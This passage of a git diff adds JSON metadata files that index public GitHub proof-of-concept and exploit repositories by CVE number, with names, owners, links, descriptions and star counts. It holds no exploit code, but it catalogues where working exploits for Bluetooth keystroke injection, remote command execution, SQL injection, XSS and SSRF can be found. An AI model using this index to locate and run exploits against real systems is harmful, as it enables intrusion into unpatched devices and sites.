"https:\/\/avatars.githubusercontent.com\/u\/144001335?v=4", + "html_url": "https:\/\/github.com\/pentestfunctions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pentestfunctions\/BlueDucky", + "description": "🚨 CVE-2023-45866 - BlueDucky Implementation (Using DuckyScript) 🔓 Unauthenticated Peering Leading to Code Execution (Using HID Keyboard)", + "fork": false, + "created_at": "2024-01-16T06:52:02Z", + "updated_at": "2025-01-07T20:59:01Z", + "pushed_at": "2024-08-18T08:26:46Z", + "stargazers_count": 1369, + "watchers_count": 1369, + "has_discussions": false, + "forks_count": 233, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 233, + "watchers": 1369, + "score": 0, + "subscribers_count": 21 + }, + { + "id": 743886715, + "name": "BluetoothDucky", + "full_name": "Eason-zz\/BluetoothDucky", + "owner": { + "login": "Eason-zz", + "id": 53202099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53202099?v=4", + "html_url": "https:\/\/github.com\/Eason-zz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eason-zz\/BluetoothDucky", + "description": "CVE-2023-45866 - BluetoothDucky implementation (Using DuckyScript)", + "fork": false, + "created_at": "2024-01-16T07:44:35Z", + "updated_at": "2024-12-14T19:08:14Z", + "pushed_at": "2024-01-15T15:16:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 747408718, + "name": "cve-2023-45866-py", + "full_name": "jjjjjjjj987\/cve-2023-45866-py", + "owner": { + "login": "jjjjjjjj987", + "id": 106833546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106833546?v=4", + "html_url": "https:\/\/github.com\/jjjjjjjj987", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jjjjjjjj987\/cve-2023-45866-py", + "description": null, + "fork": false, + "created_at": "2024-01-23T21:39:41Z", + "updated_at": "2024-01-23T21:40:35Z", + "pushed_at": "2024-01-23T21:42:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821901654, + "name": "Bluepop", + "full_name": "cisnarfu\/Bluepop", + "owner": { + "login": "cisnarfu", + "id": 169081131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169081131?v=4", + "html_url": "https:\/\/github.com\/cisnarfu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cisnarfu\/Bluepop", + "description": "CVE-2023-45866", + "fork": false, + "created_at": "2024-06-29T19:06:37Z", + "updated_at": "2024-06-29T19:09:57Z", + "pushed_at": "2024-06-29T19:09:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 851042332, + "name": "CVE-2023-45866_EXPLOITS", + "full_name": "AvishekDhakal\/CVE-2023-45866_EXPLOITS", + "owner": { + "login": "AvishekDhakal", + "id": 97275279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97275279?v=4", + "html_url": "https:\/\/github.com\/AvishekDhakal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AvishekDhakal\/CVE-2023-45866_EXPLOITS", + "description": "Exploits Tested in Mi A2 Lite and Realme 2 pro", + "fork": false, + "created_at": "2024-09-02T10:13:27Z", + "updated_at": "2024-09-02T10:15:53Z", + "pushed_at": "2024-09-02T10:15:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869860995, + "name": "CVE-2023-45866-POC", + "full_name": "Chedrian07\/CVE-2023-45866-POC", + "owner": { + "login": "Chedrian07", + "id": 108463785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108463785?v=4", + "html_url": "https:\/\/github.com\/Chedrian07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chedrian07\/CVE-2023-45866-POC", + "description": null, + "fork": false, + "created_at": "2024-10-09T02:48:58Z", + "updated_at": "2024-10-11T05:34:28Z", + "pushed_at": "2024-10-11T05:34:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 903599533, + "name": "blueXploit", + "full_name": "Danyw24\/blueXploit", + "owner": { + "login": "Danyw24", + "id": 81335686, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81335686?v=4", + "html_url": "https:\/\/github.com\/Danyw24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Danyw24\/blueXploit", + "description": "Exploit basado en vulnerabilidades criticas Bluetooth (CVE-2023-45866, CVE-2024-21306)", + "fork": false, + "created_at": "2024-12-15T03:00:47Z", + "updated_at": "2025-01-06T02:41:59Z", + "pushed_at": "2024-12-15T06:41:13Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906344035, + "name": "RustyInjector", + "full_name": "xG3nesis\/RustyInjector", + "owner": { + "login": "xG3nesis", + "id": 83365854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83365854?v=4", + "html_url": "https:\/\/github.com\/xG3nesis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xG3nesis\/RustyInjector", + "description": "Rust implementation of Marc Newlin's keystroke injection proof of concept (CVE-2023-45866).", + "fork": false, + "created_at": "2024-12-20T17:28:48Z", + "updated_at": "2024-12-20T18:17:10Z", + "pushed_at": "2024-12-20T18:14:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4590.json b/2023/CVE-2023-4590.json new file mode 100644 index 0000000000..dafd7df268 --- /dev/null +++ b/2023/CVE-2023-4590.json @@ -0,0 +1,33 @@ +[ + { + "id": 844686004, + "name": "CVE-2023-4590", + "full_name": "dgndrn\/CVE-2023-4590", + "owner": { + "login": "dgndrn", + "id": 111239114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111239114?v=4", + "html_url": "https:\/\/github.com\/dgndrn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dgndrn\/CVE-2023-4590", + "description": null, + "fork": false, + "created_at": "2024-08-19T19:08:18Z", + "updated_at": "2024-08-22T17:24:57Z", + "pushed_at": "2024-08-19T19:27:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4596.json b/2023/CVE-2023-4596.json new file mode 100644 index 0000000000..02d0f9ef8b --- /dev/null +++ b/2023/CVE-2023-4596.json @@ -0,0 +1,100 @@ +[ + { + "id": 685284508, + "name": "CVE-2023-4596", + "full_name": "E1A\/CVE-2023-4596", + "owner": { + "login": "E1A", + "id": 57531297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57531297?v=4", + "html_url": "https:\/\/github.com\/E1A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/E1A\/CVE-2023-4596", + "description": "PoC Script for CVE-2023-4596, unauthenticated Remote Command Execution through arbitrary file uploads.", + "fork": false, + "created_at": "2023-08-30T22:40:10Z", + "updated_at": "2024-10-24T17:09:32Z", + "pushed_at": "2024-02-08T20:41:01Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-4596", + "exploits", + "poc" + ], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802322129, + "name": "CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "full_name": "X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-Vulnerable-Exploit-and-Checker-Version", + "description": "CVE-2023-4596 Vulnerable Exploit and Checker Version", + "fork": false, + "created_at": "2024-05-18T01:39:12Z", + "updated_at": "2024-05-20T02:54:08Z", + "pushed_at": "2024-05-20T02:54:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838725789, + "name": "CVE-2023-4596-OpenSSH-Multi-Checker", + "full_name": "X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2023-4596-OpenSSH-Multi-Checker", + "description": "CVE-2024-6387-checker is a tool or script designed to detect the security vulnerability known as CVE-2024-6387 OpenSSH. CVE-2024-6387 OpenSSH is an entry in the Common Vulnerabilities and Exposures (CVE) that documents security weaknesses discovered in certain software or systems.", + "fork": false, + "created_at": "2024-08-06T08:12:48Z", + "updated_at": "2024-08-10T11:17:27Z", + "pushed_at": "2024-08-06T08:27:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45966.json b/2023/CVE-2023-45966.json new file mode 100644 index 0000000000..b5a191f8d0 --- /dev/null +++ b/2023/CVE-2023-45966.json @@ -0,0 +1,33 @@ +[ + { + "id": 706845140, + "name": "CVE-2023-45966", + "full_name": "jet-pentest\/CVE-2023-45966", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2023-45966", + "description": "Blind SSRF in umputun\/remark42 <= 1.12.1", + "fork": false, + "created_at": "2023-10-18T18:18:25Z", + "updated_at": "2023-10-18T18:18:25Z", + "pushed_at": "2023-10-18T18:29:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-45992.json b/2023/CVE-2023-45992.json new file mode 100644 index 0000000000..a0db62d93e --- /dev/null +++ b/2023/CVE-2023-45992.json @@ -0,0 +1,33 @@ +[ + { + "id": 707284838, + "name": "CVE-2023-45992", + "full_name": "harry935\/CVE-2023-45992", + "owner": { + "login": "harry935", + "id": 2310647, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2310647?v=4", + "html_url": "https:\/\/github.com\/harry935", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harry935\/CVE-2023-45992", + "description": null, + "fork": false, + "created_at": "2023-10-19T15:26:59Z", + "updated_at": "2023-10-19T15:27:00Z", + "pushed_at": "2023-10-19T15:45:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46003.json b/2023/CVE-2023-46003.json new file mode 100644 index 0000000000..b2f48ee1f1 --- /dev/null +++ b/2023/CVE-2023-46003.json @@ -0,0 +1,33 @@ +[ + { + "id": 707100656, + "name": "CVE-2023-46003", + "full_name": "leekenghwa\/CVE-2023-46003", + "owner": { + "login": "leekenghwa", + "id": 45155253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45155253?v=4", + "html_url": "https:\/\/github.com\/leekenghwa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leekenghwa\/CVE-2023-46003", + "description": null, + "fork": false, + "created_at": "2023-10-19T08:17:53Z", + "updated_at": "2023-10-19T08:17:54Z", + "pushed_at": "2023-10-20T01:07:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46012.json b/2023/CVE-2023-46012.json new file mode 100644 index 0000000000..a36dbb889c --- /dev/null +++ b/2023/CVE-2023-46012.json @@ -0,0 +1,33 @@ +[ + { + "id": 796794265, + "name": "CVE-2023-46012", + "full_name": "dest-3\/CVE-2023-46012", + "owner": { + "login": "dest-3", + "id": 62617135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62617135?v=4", + "html_url": "https:\/\/github.com\/dest-3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dest-3\/CVE-2023-46012", + "description": "LINKSYS AC1900 EA7500v3 IGD UPnP Stack Buffer Overflow Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2024-05-06T16:35:19Z", + "updated_at": "2024-05-18T05:48:14Z", + "pushed_at": "2024-05-18T05:48:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46014.json b/2023/CVE-2023-46014.json new file mode 100644 index 0000000000..6c2e31fbfe --- /dev/null +++ b/2023/CVE-2023-46014.json @@ -0,0 +1,33 @@ +[ + { + "id": 717160403, + "name": "CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T17:40:37Z", + "updated_at": "2023-11-10T17:40:37Z", + "pushed_at": "2023-11-14T08:32:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46015.json b/2023/CVE-2023-46015.json new file mode 100644 index 0000000000..f62dff6bb4 --- /dev/null +++ b/2023/CVE-2023-46015.json @@ -0,0 +1,33 @@ +[ + { + "id": 717199456, + "name": "CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46015-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T19:40:49Z", + "updated_at": "2023-11-10T20:15:16Z", + "pushed_at": "2023-11-14T08:53:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46016.json b/2023/CVE-2023-46016.json new file mode 100644 index 0000000000..f581986db5 --- /dev/null +++ b/2023/CVE-2023-46016.json @@ -0,0 +1,33 @@ +[ + { + "id": 717212106, + "name": "CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46016-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T20:24:40Z", + "updated_at": "2023-11-10T20:24:41Z", + "pushed_at": "2023-11-14T08:57:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46017.json b/2023/CVE-2023-46017.json new file mode 100644 index 0000000000..2f0aa1696d --- /dev/null +++ b/2023/CVE-2023-46017.json @@ -0,0 +1,33 @@ +[ + { + "id": 717217919, + "name": "CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-10T20:46:29Z", + "updated_at": "2023-11-10T20:46:30Z", + "pushed_at": "2023-11-14T09:00:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46018.json b/2023/CVE-2023-46018.json new file mode 100644 index 0000000000..0d5a80bc86 --- /dev/null +++ b/2023/CVE-2023-46018.json @@ -0,0 +1,33 @@ +[ + { + "id": 717349464, + "name": "CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T07:37:57Z", + "updated_at": "2023-11-11T07:37:57Z", + "pushed_at": "2023-11-14T09:02:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46019.json b/2023/CVE-2023-46019.json new file mode 100644 index 0000000000..193b029057 --- /dev/null +++ b/2023/CVE-2023-46019.json @@ -0,0 +1,33 @@ +[ + { + "id": 717359044, + "name": "CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46019-Code-Projects-Blood-Bank-1.0-Reflected-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T08:23:30Z", + "updated_at": "2023-11-11T08:23:31Z", + "pushed_at": "2023-11-14T09:04:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46020.json b/2023/CVE-2023-46020.json new file mode 100644 index 0000000000..e1e89724b8 --- /dev/null +++ b/2023/CVE-2023-46020.json @@ -0,0 +1,33 @@ +[ + { + "id": 717361875, + "name": "CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46020-Code-Projects-Blood-Bank-1.0-Stored-Cross-Site-Scripting-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T08:37:57Z", + "updated_at": "2023-11-11T08:37:58Z", + "pushed_at": "2023-11-14T09:05:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46021.json b/2023/CVE-2023-46021.json new file mode 100644 index 0000000000..d53d4be4f0 --- /dev/null +++ b/2023/CVE-2023-46021.json @@ -0,0 +1,33 @@ +[ + { + "id": 717369802, + "name": "CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T09:14:56Z", + "updated_at": "2023-11-11T10:55:41Z", + "pushed_at": "2023-11-14T09:55:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46022.json b/2023/CVE-2023-46022.json new file mode 100644 index 0000000000..c81cf1d4e7 --- /dev/null +++ b/2023/CVE-2023-46022.json @@ -0,0 +1,33 @@ +[ + { + "id": 717392042, + "name": "CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "full_name": "ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "owner": { + "login": "ersinerenler", + "id": 113091631, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113091631?v=4", + "html_url": "https:\/\/github.com\/ersinerenler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ersinerenler\/CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-11-11T10:54:25Z", + "updated_at": "2024-10-13T19:20:00Z", + "pushed_at": "2024-10-13T19:19:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46197.json b/2023/CVE-2023-46197.json new file mode 100644 index 0000000000..c4f14fcae7 --- /dev/null +++ b/2023/CVE-2023-46197.json @@ -0,0 +1,33 @@ +[ + { + "id": 708807176, + "name": "CVE-2023-46197", + "full_name": "RandomRobbieBF\/CVE-2023-46197", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-46197", + "description": "Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure", + "fork": false, + "created_at": "2023-10-23T12:38:37Z", + "updated_at": "2023-10-23T12:38:37Z", + "pushed_at": "2023-10-23T12:44:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4622.json b/2023/CVE-2023-4622.json new file mode 100644 index 0000000000..98f5a5d2ea --- /dev/null +++ b/2023/CVE-2023-4622.json @@ -0,0 +1,33 @@ +[ + { + "id": 820662539, + "name": "CVE-CVE-2023-4622", + "full_name": "0range1337\/CVE-CVE-2023-4622", + "owner": { + "login": "0range1337", + "id": 146405672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146405672?v=4", + "html_url": "https:\/\/github.com\/0range1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0range1337\/CVE-CVE-2023-4622", + "description": null, + "fork": false, + "created_at": "2024-06-26T23:42:38Z", + "updated_at": "2024-06-26T23:48:15Z", + "pushed_at": "2024-06-26T23:48:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-46303.json b/2023/CVE-2023-46303.json new file mode 100644 index 0000000000..1fa527d098 --- /dev/null +++ b/2023/CVE-2023-46303.json @@ -0,0 +1,33 @@ +[ + { + "id": 646374478, + "name": "ssrf-via-img", + "full_name": "0x1717\/ssrf-via-img", + "owner": { + "login": "0x1717", + "id": 124237568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124237568?v=4", + "html_url": "https:\/\/github.com\/0x1717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x1717\/ssrf-via-img", + "description": "CVE-2023-46303 - SSRF Vulnerability in PANDOC and CALIBRE", + "fork": false, + "created_at": "2023-05-28T07:26:49Z", + "updated_at": "2024-01-16T14:37:50Z", + "pushed_at": "2024-01-16T14:40:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": 